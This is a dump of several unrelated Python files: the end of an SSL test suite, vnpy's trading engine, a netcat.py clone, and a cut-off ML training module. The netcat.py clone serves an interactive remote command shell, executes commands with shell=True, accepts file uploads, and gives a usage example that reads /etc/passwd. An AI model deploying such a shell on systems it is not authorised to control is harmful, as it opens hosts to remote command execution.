    with self.assertRaises(ssl.SSLError) as cm, \
            support.captured_stderr() as stderr:
        server_params_test(client_context, server_context,
                           chatty=False, sni_name='supermessage')
    self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
    self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
    """read()/write() on a closed SSL socket must raise ValueError."""
    context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations(CERTFILE)
    context.load_cert_chain(CERTFILE)
    server = ThreadedEchoServer(context=context, chatty=False)

    with server:
        sock = context.wrap_socket(socket.socket())
        sock.connect((HOST, server.port))
        sock.close()
        with self.assertRaises(ValueError):
            sock.read(1024)
        with self.assertRaises(ValueError):
            sock.write(b'hello')
def test_main(verbose=False):
    """Entry point: optionally print environment info, verify the
    certificate fixtures exist, then run the test classes (threaded
    suites only when threading is available)."""
    if support.verbose:
        # Pick a platform-specific version probe; fall back to
        # platform.platform() if none reports anything useful.
        # NOTE(review): platform.linux_distribution was removed in
        # Python 3.8 — this lookup assumes an older interpreter.
        plats = {
            'Linux': platform.linux_distribution,
            'Mac': platform.mac_ver,
            'Windows': platform.win32_ver,
        }
        for name, func in plats.items():
            plat = func()
            if plat and plat[0]:
                plat = '%s %r' % (name, plat)
                break
        else:
            plat = repr(platform.platform())
        print("test_ssl: testing with %r %r" %
              (ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
        print(" under %s" % plat)
        print(" HAS_SNI = %r" % ssl.HAS_SNI)
        print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
        try:
            print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
        except AttributeError:
            # Constant only exists when OpenSSL supports TLSv1.1.
            pass

    # Fail fast if any certificate fixture is missing.
    for filename in [
        CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
        ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
        SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
        BADCERT, BADKEY, EMPTYCERT]:
        if not os.path.exists(filename):
            raise support.TestFailed("Can't read certificate file %r" % filename)

    tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests]

    if support.is_resource_enabled('network'):
        tests.append(NetworkedTests)

    if _have_threads:
        thread_info = support.threading_setup()
        if thread_info:
            tests.append(ThreadedTests)

    try:
        support.run_unittest(*tests)
    finally:
        if _have_threads:
            support.threading_cleanup(*thread_info)
if __name__ == "__main__":
    # Allow running this test file directly.
    test_main()
|
engine.py | """
"""
import logging
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
class MainEngine:
    """
    Acts as the core of VN Trader.

    Owns the event engine plus every gateway, function engine and app,
    and routes trading requests (subscribe/send/cancel/query) to the
    gateway named by the caller.
    """

    def __init__(self, event_engine: EventEngine = None):
        """Use the given event engine, or create and start a private one."""
        if event_engine:
            self.event_engine = event_engine
        else:
            self.event_engine = EventEngine()
        self.event_engine.start()

        self.gateways = {}      # gateway_name -> gateway instance
        self.engines = {}       # engine_name -> function engine instance
        self.apps = {}          # app_name -> app instance
        self.exchanges = []     # union of exchanges supported by gateways

        os.chdir(TRADER_DIR)    # Change working directory
        self.init_engines()     # Initialize function engines

    def add_engine(self, engine_class: Any):
        """
        Add function engine.
        """
        engine = engine_class(self, self.event_engine)
        self.engines[engine.engine_name] = engine
        return engine

    def add_gateway(self, gateway_class: Type[BaseGateway]):
        """
        Add gateway.
        """
        gateway = gateway_class(self.event_engine)
        self.gateways[gateway.gateway_name] = gateway

        # Add gateway supported exchanges into engine
        for exchange in gateway.exchanges:
            if exchange not in self.exchanges:
                self.exchanges.append(exchange)

        return gateway

    def add_app(self, app_class: Type[BaseApp]):
        """
        Add app and the function engine it declares.
        """
        app = app_class()
        self.apps[app.app_name] = app

        engine = self.add_engine(app.engine_class)
        return engine

    def init_engines(self):
        """
        Init all engines.
        """
        self.add_engine(LogEngine)
        self.add_engine(OmsEngine)
        self.add_engine(EmailEngine)

    def write_log(self, msg: str, source: str = ""):
        """
        Put log event with specific message.
        """
        log = LogData(msg=msg, gateway_name=source)
        event = Event(EVENT_LOG, log)
        self.event_engine.put(event)

    def get_gateway(self, gateway_name: str):
        """
        Return gateway object by name; logs and returns None if missing.
        """
        gateway = self.gateways.get(gateway_name, None)
        if not gateway:
            self.write_log(f"找不到底层接口:{gateway_name}")
        return gateway

    def get_engine(self, engine_name: str):
        """
        Return engine object by name; logs and returns None if missing.
        """
        engine = self.engines.get(engine_name, None)
        if not engine:
            self.write_log(f"找不到引擎:{engine_name}")
        return engine

    def get_default_setting(self, gateway_name: str):
        """
        Get default setting dict of a specific gateway.
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            return gateway.get_default_setting()
        return None

    def get_all_gateway_names(self):
        """
        Get all names of gateways added in main engine.
        """
        return list(self.gateways.keys())

    def get_all_apps(self):
        """
        Get all app objects.
        """
        return list(self.apps.values())

    def get_all_exchanges(self):
        """
        Get all exchanges.
        """
        return self.exchanges

    def connect(self, setting: dict, gateway_name: str):
        """
        Start connection of a specific gateway.
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            gateway.connect(setting)

    def subscribe(self, req: SubscribeRequest, gateway_name: str):
        """
        Subscribe tick data update of a specific gateway.
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            gateway.subscribe(req)

    def send_order(self, req: OrderRequest, gateway_name: str):
        """
        Send new order request to a specific gateway.
        Returns the order id string, or "" when the gateway is unknown.
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            return gateway.send_order(req)
        else:
            return ""

    def cancel_order(self, req: CancelRequest, gateway_name: str):
        """
        Send cancel order request to a specific gateway.
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            gateway.cancel_order(req)

    def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str):
        """
        Send a batch of order requests to a specific gateway.
        Returns one id per request ("" each when the gateway is unknown).
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            return gateway.send_orders(reqs)
        else:
            return ["" for req in reqs]

    def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str):
        """
        Send a batch of cancel requests to a specific gateway.
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            gateway.cancel_orders(reqs)

    def query_history(self, req: HistoryRequest, gateway_name: str):
        """
        Query history data from a specific gateway; None when unknown.
        """
        gateway = self.get_gateway(gateway_name)
        if gateway:
            return gateway.query_history(req)
        else:
            return None

    def close(self):
        """
        Make sure every gateway and app is closed properly before
        programme exit.
        """
        # Stop event engine first to prevent new timer event.
        self.event_engine.stop()

        for engine in self.engines.values():
            engine.close()

        for gateway in self.gateways.values():
            gateway.close()
class BaseEngine(ABC):
    """
    Abstract base class for function engines plugged into MainEngine.

    Subclasses receive the main engine and event engine at construction
    and may override close() to release resources on shutdown.
    """

    def __init__(
        self,
        main_engine: MainEngine,
        event_engine: EventEngine,
        engine_name: str,
    ):
        """Remember the engines this component is wired to and its name."""
        self.main_engine = main_engine
        self.event_engine = event_engine
        self.engine_name = engine_name

    def close(self):
        """Default shutdown hook: nothing to release."""
class LogEngine(BaseEngine):
    """
    Processes log event and output with logging module.

    Handler setup is driven by the global SETTINGS: the engine stays
    inert unless "log.active" is true; console/file handlers are added
    according to "log.console"/"log.file".
    """

    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        """Configure the 'VN Trader' logger and subscribe to log events."""
        super(LogEngine, self).__init__(main_engine, event_engine, "log")

        if not SETTINGS["log.active"]:
            # Logging disabled: register nothing, keep the engine inert.
            return

        self.level = SETTINGS["log.level"]

        self.logger = logging.getLogger("VN Trader")
        self.logger.setLevel(self.level)

        self.formatter = logging.Formatter(
            "%(asctime)s %(levelname)s: %(message)s"
        )

        self.add_null_handler()

        if SETTINGS["log.console"]:
            self.add_console_handler()

        if SETTINGS["log.file"]:
            self.add_file_handler()

        self.register_event()

    def add_null_handler(self):
        """
        Add null handler for logger.
        """
        # Guarantees at least one handler so the logging module never
        # complains about a handler-less logger.
        null_handler = logging.NullHandler()
        self.logger.addHandler(null_handler)

    def add_console_handler(self):
        """
        Add console output of log.
        """
        console_handler = logging.StreamHandler()
        console_handler.setLevel(self.level)
        console_handler.setFormatter(self.formatter)
        self.logger.addHandler(console_handler)

    def add_file_handler(self):
        """
        Add file output of log (one file per day under the log folder).
        """
        today_date = datetime.now().strftime("%Y%m%d")
        filename = f"vt_{today_date}.log"
        log_path = get_folder_path("log")
        file_path = log_path.joinpath(filename)

        file_handler = logging.FileHandler(
            file_path, mode="a", encoding="utf8"
        )
        file_handler.setLevel(self.level)
        file_handler.setFormatter(self.formatter)
        self.logger.addHandler(file_handler)

    def register_event(self):
        """Subscribe process_log_event to EVENT_LOG."""
        self.event_engine.register(EVENT_LOG, self.process_log_event)

    def process_log_event(self, event: Event):
        """
        Process log event.
        """
        log = event.data
        # The LogData record carries its own severity level.
        self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
    """
    Provides order management system function for VN Trader.

    Caches the latest tick/order/trade/position/account/contract data
    arriving through the event engine and exposes query helpers, which
    are also grafted onto the main engine for convenient access.
    """

    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        """Create the data caches and wire up queries and event handlers."""
        super(OmsEngine, self).__init__(main_engine, event_engine, "oms")

        self.ticks = {}          # vt_symbol -> latest tick
        self.orders = {}         # vt_orderid -> latest order state
        self.trades = {}         # vt_tradeid -> trade
        self.positions = {}      # vt_positionid -> latest position
        self.accounts = {}       # vt_accountid -> latest account
        self.contracts = {}      # vt_symbol -> contract
        self.active_orders = {}  # vt_orderid -> order still active

        self.add_function()
        self.register_event()

    def add_function(self):
        """Add query function to main engine."""
        self.main_engine.get_tick = self.get_tick
        self.main_engine.get_order = self.get_order
        self.main_engine.get_trade = self.get_trade
        self.main_engine.get_position = self.get_position
        self.main_engine.get_account = self.get_account
        self.main_engine.get_contract = self.get_contract
        self.main_engine.get_all_ticks = self.get_all_ticks
        self.main_engine.get_all_orders = self.get_all_orders
        self.main_engine.get_all_trades = self.get_all_trades
        self.main_engine.get_all_positions = self.get_all_positions
        self.main_engine.get_all_accounts = self.get_all_accounts
        self.main_engine.get_all_contracts = self.get_all_contracts
        self.main_engine.get_all_active_orders = self.get_all_active_orders

    def register_event(self):
        """Subscribe the per-type cache updaters to their events."""
        self.event_engine.register(EVENT_TICK, self.process_tick_event)
        self.event_engine.register(EVENT_ORDER, self.process_order_event)
        self.event_engine.register(EVENT_TRADE, self.process_trade_event)
        self.event_engine.register(EVENT_POSITION, self.process_position_event)
        self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
        self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)

    def process_tick_event(self, event: Event):
        """Cache the latest tick for its symbol."""
        tick = event.data
        self.ticks[tick.vt_symbol] = tick

    def process_order_event(self, event: Event):
        """Cache the order and maintain the active-order subset."""
        order = event.data
        self.orders[order.vt_orderid] = order

        # If order is active, then update data in dict.
        if order.is_active():
            self.active_orders[order.vt_orderid] = order
        # Otherwise, pop inactive order from in dict
        elif order.vt_orderid in self.active_orders:
            self.active_orders.pop(order.vt_orderid)

    def process_trade_event(self, event: Event):
        """Cache the trade by its id."""
        trade = event.data
        self.trades[trade.vt_tradeid] = trade

    def process_position_event(self, event: Event):
        """Cache the latest position for its id."""
        position = event.data
        self.positions[position.vt_positionid] = position

    def process_account_event(self, event: Event):
        """Cache the latest account snapshot for its id."""
        account = event.data
        self.accounts[account.vt_accountid] = account

    def process_contract_event(self, event: Event):
        """Cache the contract by its symbol."""
        contract = event.data
        self.contracts[contract.vt_symbol] = contract

    def get_tick(self, vt_symbol):
        """
        Get latest market tick data by vt_symbol.
        """
        return self.ticks.get(vt_symbol, None)

    def get_order(self, vt_orderid):
        """
        Get latest order data by vt_orderid.
        """
        return self.orders.get(vt_orderid, None)

    def get_trade(self, vt_tradeid):
        """
        Get trade data by vt_tradeid.
        """
        return self.trades.get(vt_tradeid, None)

    def get_position(self, vt_positionid):
        """
        Get latest position data by vt_positionid.
        """
        return self.positions.get(vt_positionid, None)

    def get_account(self, vt_accountid):
        """
        Get latest account data by vt_accountid.
        """
        return self.accounts.get(vt_accountid, None)

    def get_contract(self, vt_symbol):
        """
        Get contract data by vt_symbol.
        """
        return self.contracts.get(vt_symbol, None)

    def get_all_ticks(self):
        """
        Get all tick data.
        """
        return list(self.ticks.values())

    def get_all_orders(self):
        """
        Get all order data.
        """
        return list(self.orders.values())

    def get_all_trades(self):
        """
        Get all trade data.
        """
        return list(self.trades.values())

    def get_all_positions(self):
        """
        Get all position data.
        """
        return list(self.positions.values())

    def get_all_accounts(self):
        """
        Get all account data.
        """
        return list(self.accounts.values())

    def get_all_contracts(self):
        """
        Get all contract data.
        """
        return list(self.contracts.values())

    def get_all_active_orders(self, vt_symbol: str = ""):
        """
        Get all active orders by vt_symbol.

        If vt_symbol is empty, return all active orders.
        """
        if not vt_symbol:
            return list(self.active_orders.values())
        else:
            active_orders = [
                order
                for order in self.active_orders.values()
                if order.vt_symbol == vt_symbol
            ]
            return active_orders
class EmailEngine(BaseEngine):
    """
    Provides email sending function for VN Trader.

    Emails are queued and delivered from a background thread so callers
    never block on SMTP I/O. Connection parameters and the default
    sender/receiver come from the global SETTINGS.
    """

    def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
        """Set up the worker thread/queue and expose send_email on main engine."""
        super(EmailEngine, self).__init__(main_engine, event_engine, "email")

        self.thread = Thread(target=self.run)
        self.queue = Queue()
        self.active = False

        self.main_engine.send_email = self.send_email

    def send_email(self, subject: str, content: str, receiver: str = ""):
        """
        Queue an email for delivery.

        Args:
            subject: Subject line.
            content: Plain-text message body.
            receiver: Destination address; falls back to the
                "email.receiver" setting when empty.
        """
        # Start email engine when sending first email.
        if not self.active:
            self.start()

        # Use default receiver if not specified.
        if not receiver:
            receiver = SETTINGS["email.receiver"]

        msg = EmailMessage()
        msg["From"] = SETTINGS["email.sender"]
        # Bug fix: honor the explicit receiver argument instead of
        # always addressing the configured default receiver.
        msg["To"] = receiver
        msg["Subject"] = subject
        msg.set_content(content)

        self.queue.put(msg)

    def run(self):
        """Worker loop: drain the queue and deliver messages over SMTP_SSL."""
        while self.active:
            try:
                msg = self.queue.get(block=True, timeout=1)

                with smtplib.SMTP_SSL(
                    SETTINGS["email.server"], SETTINGS["email.port"]
                ) as smtp:
                    smtp.login(
                        SETTINGS["email.username"], SETTINGS["email.password"]
                    )
                    smtp.send_message(msg)
            except Empty:
                # Timed out waiting for a message; loop to re-check active.
                pass

    def start(self):
        """Mark the engine active and start the delivery thread."""
        self.active = True
        self.thread.start()

    def close(self):
        """Stop the delivery loop and join the worker thread."""
        if not self.active:
            return

        self.active = False
        self.thread.join()
|
netcat.py | # ./netcat.py -l -p 9999 -c
# ./netcat.py -t localhost -p 9999
# echo -ne "GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n" | ./netcat.py -t www.google.com -p 80
import sys
import socket
import getopt
import threading
import subprocess
# Global option state shared between main() and the connection handlers.
listen = False           # -l: act as a server and wait for connections
command = False          # -c: offer an interactive command shell
upload = False           # declared global in client_handler; mode is driven by upload_destination
execute = ""             # -e: command to run when a client connects
target = ""              # -t: host to connect to (or bind to when listening)
upload_destination = ""  # -u: path an uploaded file is written to
port = 0                 # -p: TCP port number
def usage():
    """Print command-line help and exit the process (Python 2 script)."""
    print "Net Tool"
    print
    print "Usage: netcat.py -t target_host -p port"
    print "-l --listen - listen on [host]:[port] for incoming connections"
    print "-e --execute=file_to_run - execute the given file upon receiving a connection"
    print "-c --command - initialize a command shell"
    print "-u --upload=destination - upon receiving connection upload a file and write to [destination]"
    print
    print
    print "Example: "
    print "netcat.py -t 192.168.0.1 -p 5555 -l -c"
    print "netcat.py -t 192.168.0.1 -p 5555 -l -u=/home/ubuntu/target"
    print "netcat.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
    print "echo 'ABCDEFGHI' | ./netcat.py -t 192.168.11.12 -p 135"
    # Exit after printing help, whatever brought us here.
    sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the commandline options
try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:", ["help", "listen", "execute", "target", "port", "command", "upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
# are we going to listen or just send data from stdin?
if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands, and drop a shell back
# depending on our command line options above
if listen:
server_loop()
def client_sender(buffer):
    """Connect to target:port, send *buffer*, then relay between stdin
    and the server until the connection drops (Python 2 client mode)."""
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        # connect to our target host
        client.connect((target, port))

        if len(buffer):
            client.send(buffer)

        while True:
            # now wait for data back
            recv_len = 1
            response = ""

            # accumulate until a short read suggests the burst is over
            while recv_len:
                data = client.recv(4096)
                recv_len = len(data)
                response += data

                if recv_len < 4096:
                    break

            print response

            # wait for more input
            buffer = raw_input("")
            buffer += "\n"

            # send it off
            client.send(buffer)
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt and
        # programming errors; socket.error would be the narrower catch.
        print "[*] Exception! Exiting."

        # tear down the connection
        client.close()
def server_loop():
    """Bind to target:port (all interfaces when no target was given) and
    spawn one client_handler thread per accepted connection."""
    global target

    # if no target is defined, we listen on all interfaces
    if not len(target):
        target = "0.0.0.0"

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)

    while True:
        client_socket, addr = server.accept()

        # hand the new client off to its own thread
        handler_thread = threading.Thread(target=client_handler,
                                          args=(client_socket,))
        handler_thread.start()
def run_command(command):
    """Run *command* in a shell and return its combined stdout+stderr.

    On failure (non-zero exit status, unlaunchable command, or an invalid
    argument) a fixed error string is returned instead of raising.
    """
    # trim the newline
    command = command.rstrip()

    # run the command and get the output back; catch only the errors
    # subprocess can actually raise instead of using a bare except
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
    except (subprocess.CalledProcessError, OSError, ValueError):
        output = "Failed to execute command.\r\n"

    # send the output back to the caller
    return output
def client_handler(client_socket):
    """Serve one client according to the global mode flags: receive an
    upload, run a one-shot command, and/or provide a command shell.

    NOTE(review): Python 2 semantics — str and bytes are interchangeable
    here; the send() calls with str literals assume that.
    """
    global upload
    global execute
    global command

    # check for upload
    if len(upload_destination):
        # read in all of the bytes and write to our destination
        file_buffer = ""

        # keep reading data until none is available
        while True:
            data = client_socket.recv(1024)

            if not data:
                break
            else:
                file_buffer += data

        # now we take these bytes and try to write them out
        try:
            file_descriptor = open(upload_destination, "wb")
            file_descriptor.write(file_buffer)
            file_descriptor.close()

            # acknowledge that we wrote the file out
            client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
        except:
            # NOTE(review): bare except hides the real I/O error from the
            # operator; only the client learns the write failed.
            client_socket.send("Failed to save file to %s\r\n" % upload_destination)

    # if check for command execution
    if len(execute):
        # run the command
        output = run_command(execute)
        client_socket.send(output)

    # now we go into another loop if a command shell was requested
    if command:
        while True:
            # show a simple prompt
            client_socket.send("<NETCAT:#> ")

            # now we receive until we see a linefeed (enter key)
            cmd_buffer = ""
            while "\n" not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024)

            # send back the command output
            response = run_command(cmd_buffer)

            # send back the response
            client_socket.send(response)
if __name__ == '__main__':
    # Script entry point.
    main()
|
train.py | import copy
import datetime
import json
import time
import sys
import os
import os.path
import multiprocessing
import signal
import pickle
import shutil
from collections import defaultdict
from pathlib import Path
from abc import ABC, abstractmethod
from dataclasses import dataclass, is_dataclass
from typing import Optional, Any, Iterable, Dict, List, Union, Collection
try: # Literal might not be supported in python versions earlier than 3.7
from typing import Literal
except ImportError:
from typing_extensions import Literal
from .performance import setup_metrics, EvaluationMetric
from .monitor import Monitor
from .util import load_config
from tqdm import trange, tqdm
import numpy as np
class BaseModel(ABC):
    """Interface every trainable model must implement.

    Concrete models additionally subclass MinibatchModel or
    FullbatchModel to declare how they consume training data.
    """

    @abstractmethod
    def get_metadata(self) -> Dict:
        """Return a serializable description of the model."""

    @abstractmethod
    def evaluation_metrics(self) -> List[EvaluationMetric]:
        """Return the metrics used to score this model."""

    @abstractmethod
    def save(self, save_path) -> Union[str, Path]:
        """Persist the model under *save_path* and return the saved path."""
class MinibatchModel(BaseModel):
    """Model trained and evaluated one minibatch at a time."""

    @abstractmethod
    def fit_batch(self, batch) -> Dict:
        """Train on one batch; return a dict of training statistics."""

    @abstractmethod
    def evaluate_batch(self, batch) -> Dict:
        """Score one batch; return a dict of evaluation statistics."""
class FullbatchModel(BaseModel):
    """Model trained and evaluated on the whole dataset at once.

    NOTE(review): the parameter is named *batch* but, per the training
    loop, receives the entire dataset — confirm before renaming.
    """

    @abstractmethod
    def fit_dataset(self, batch) -> Dict:
        """Train on the full dataset; return training statistics."""

    @abstractmethod
    def evaluate_dataset(self, batch) -> Dict:
        """Score the full dataset; return evaluation statistics."""
class JSONEncoder(json.JSONEncoder):
    """JSON encoder that also handles dataclasses and falls back to str().

    Dataclasses are encoded as their attribute dict plus
    'dataclass_name'/'dataclass_module' markers; any other
    non-serializable object (e.g. pathlib paths) becomes str(o).
    """

    def default(self, o):
        if is_dataclass(o):
            payload = copy.copy(o.__dict__)
            payload['dataclass_name'] = o.__class__.__name__
            payload['dataclass_module'] = o.__module__
            return payload
        try:
            return super().default(o)
        except TypeError:
            return str(o)
class TrainingError(Exception):
    """Raised when training fails; carries the run's metadata for debugging."""

    def __init__(self, metadata, message):
        self.metadata = metadata
        self.message = message

    def __str__(self):
        return "{}\n Metadata was: {}".format(self.message, self.metadata)
def run_experiments(num_experiments, experiment_kwargs_list, experiment_function, kwargs, rng=None):
    """Run every parameter combination *num_experiments* times, each in a
    fresh subprocess so native-level crashes cannot kill the driver.

    Args:
        num_experiments: Repetitions per parameter set.
        experiment_kwargs_list: List of parameter dicts merged into kwargs.
        experiment_function: Callable executed by the worker subprocess.
        kwargs: Base keyword arguments; updated in place per task.
        rng: Optional numpy RandomState used to draw per-run seeds.

    KeyboardInterrupt stops the sweep quietly; a dead subprocess stops
    the whole driver.
    """
    if rng is None:
        rng = np.random.RandomState()

    total_num_experiments = len(experiment_kwargs_list)*num_experiments
    try:
        current_experiment = 0
        for i in range(num_experiments):
            for task_params in experiment_kwargs_list:
                current_experiment += 1
                print('Starting experiment {}/{}'.format(current_experiment, total_num_experiments))
                print('Starting task with params {}'.format(task_params))
                kwargs.update(task_params)
                # Fresh seed per run so repetitions differ but remain
                # reproducible through rng.
                kwargs['random_seed'] = rng.randint(0, 2**32)
                kwargs['experiment_function'] = experiment_function
                p = multiprocessing.Process(target=worker, kwargs=kwargs)
                p.start()
                p.join()
                if p.exitcode != 0:
                    # For now we assume that the process died because of out
                    # of memory exceptions.
                    # Bug fix: report the actual exit code instead of the
                    # hard-coded "1".
                    print("Process died with exit code {}.".format(p.exitcode))
                    sys.exit(0)
    except KeyboardInterrupt:
        pass
def worker(*, experiment_function, device='cpu', backend='theano', **kwargs):
    """Configure the compute device for the chosen backend, then invoke
    experiment_function with a metadata record and the remaining kwargs."""
    if not device == 'cpu':
        if backend == 'pytorch':
            # pytorch models pick the device up from their kwargs
            kwargs['device'] = device
        elif backend == 'theano':
            print("Setting device {}".format(device))
            import pygpu.gpuarray
            import theano.gpuarray
            theano.gpuarray.use(device)

    print("Starting new training with parameters:")
    metadata = {'command_line_params': kwargs}
    for param, value in sorted(kwargs.items()):
        print(" {}: {}".format(param, value))
    experiment_function(metadata=metadata, backend=backend, **kwargs)
def make_timestamp():
    """Current local time as 'YYYY-MM-DDTHH.MM.SS'.

    Dots (not colons) separate the time fields so the string is a valid
    filename on Windows as well.
    """
    now = datetime.datetime.now()
    return now.strftime("%Y-%m-%dT%H.%M.%S")
def run_experiment(*, hyper_parameters=None, model_factory=None, **kwargs):
    """Train one model per hyper-parameter setting.

    Bug fix: the factory is now called with the current setting *hp*;
    previously the loop variable was unused and the whole
    hyper_parameters collection was passed on every iteration.
    """
    if hyper_parameters is not None:
        for hp in hyper_parameters:
            model = model_factory(hp)
            train(model=model, **kwargs)
@dataclass
class TrainingConfig(object):
    """ Configuration dataclass for the mltrain.train.train function.

    Args:
        max_epochs (int): Train for at most this number of epochs
        keep_snapshots (bool): If True, keep all checkpoints from training. If False, only the best and the latest
            checkpoints are saved. NOTE(review): the field also accepts the
            literals 'all'/'none'/'best'; their exact semantics are assumed to
            mirror the boolean behavior — confirm against the checkpoint code.
        eval_time (int): Run the evaluation loop and checkpointing after this number of seconds has passed
        eval_iterations (int): Run the evaluation loop after these many training iterations (batches)
        eval_epochs (int): Run the evaluation loop after these many epochs have passed.
        model_format_string (str): Use this format string for saving model checkpoint files.
        do_pre_eval (bool): Run the evaluation loop before training starts.
    """
    max_epochs: int = 1
    keep_snapshots: Union[Literal['all', 'none', 'best'], bool] = 'none'
    eval_time: Optional[int] = None
    eval_iterations: Optional[int] = None
    eval_epochs: int = 1
    model_format_string: Optional[str] = None
    do_pre_eval: bool = False
@dataclass
class TrainingArguments(object):
    """Bundle of everything mltrain.train.train needs for one run."""
    # The model to train; implements MinibatchModel or FullbatchModel.
    model: Union[BaseModel, FullbatchModel, MinibatchModel]
    # Base output directory; a timestamped run directory is created inside.
    output_dir: Path
    # Training data (iterated as batches, or passed whole to fit_dataset).
    training_dataset: Iterable
    # Held-out data consumed by the evaluation loop.
    evaluation_dataset: Iterable
    training_config: TrainingConfig
    # Optional run metadata, serialized to metadata.json.
    metadata: Optional[Dict] = None
    # Optional name -> object mapping, pickled into artifacts/.
    artifacts: Optional[Dict] = None
    # Optional files copied verbatim into the run directory.
    files: Optional[List[Path]] = None
def train(
        *,
        training_args: TrainingArguments):
    """Prepare the run directory, execute the training loop, and return
    (best_performance, best_model_path).

    Any exception raised while training is re-raised as a TrainingError
    carrying the run's metadata.
    """
    args = training_args
    best_performance, model_format_string, output_dir = setup_training(
        model=args.model,
        training_config=args.training_config,
        metadata=args.metadata,
        artifacts=args.artifacts,
        output_dir=args.output_dir,
        files=args.files,
    )
    try:
        return training_loop(
            model=args.model,
            training_dataset=args.training_dataset,
            evaluation_dataset=args.evaluation_dataset,
            training_config=args.training_config,
            best_performance=best_performance,
            model_checkpoint_format=model_format_string,
            output_dir=output_dir,
        )
    except Exception as e:
        raise TrainingError(args.metadata, "Error during training") from e
def setup_training(
        *,
        model,
        training_config: TrainingConfig,
        output_dir,
        files=None,
        artifacts=None,
        metadata=None):
    """Create the timestamped run directory and write run inputs into it.

    Creates output_dir/<timestamp>/ (retrying until an unused timestamp is
    found), pickles *artifacts* into artifacts/, copies *files* into
    files/, writes metadata.json, and initializes the best-performance
    record from the model's metrics.

    Returns:
        (best_performance, model_format_string, run_dir) where
        model_format_string is a path template for checkpoint files.
    """
    model_format_string = training_config.model_format_string
    if model_format_string is None:
        model_format_string = model.__class__.__name__ + '_epoch-{epoch:.04f}_{metrics}'

    # Pick a timestamped run directory under the requested output_dir.
    # Bug fix: on a name collision, retry with a *sibling* timestamp
    # instead of nesting a second timestamp inside the existing directory.
    base_dir = output_dir
    output_dir = base_dir / make_timestamp()
    while output_dir.exists():
        time.sleep(1)
        output_dir = base_dir / make_timestamp()

    model_format_string = output_dir / model_format_string
    setup_directory(output_dir)

    if artifacts is not None:
        artifacts_dir = output_dir / 'artifacts'
        artifacts_dir.mkdir()
        for k, v in artifacts.items():
            with open(artifacts_dir / (k + '.pkl'), 'wb') as fp:
                pickle.dump(v, fp)

    if files is not None:
        dst_dir = output_dir / 'files'
        dst_dir.mkdir()
        for file in files:
            shutil.copy(file, dst_dir)

    if metadata is None:
        metadata = dict()
    try:
        model_metadata = model.get_metadata()
        metadata['model_metadata'] = model_metadata
    except AttributeError:
        print("Couldn't get model parameters, skipping model_params for the metadata")
    metadata['training_params'] = training_config

    json_encoder = JSONEncoder(sort_keys=True, indent=4, separators=(',', ': '))
    with open(os.path.join(output_dir, 'metadata.json'), 'w') as metadata_fp:
        json_encoding = json_encoder.encode(metadata)
        metadata_fp.write(json_encoding)

    best_performance = setup_metrics(model.evaluation_metrics())
    return best_performance, model_format_string, output_dir
def training_loop(
        *,
        model,
        training_dataset,
        evaluation_dataset,
        training_config,
        best_performance,
        model_checkpoint_format,
        output_dir
):
    """Run the main fit/evaluate loop for up to ``training_config.max_epochs``.

    Evaluation cadence is controlled by three independent knobs on
    *training_config*: ``eval_time`` (seconds), ``eval_iterations``
    (training batches) and ``eval_epochs`` (whole epochs). Models may
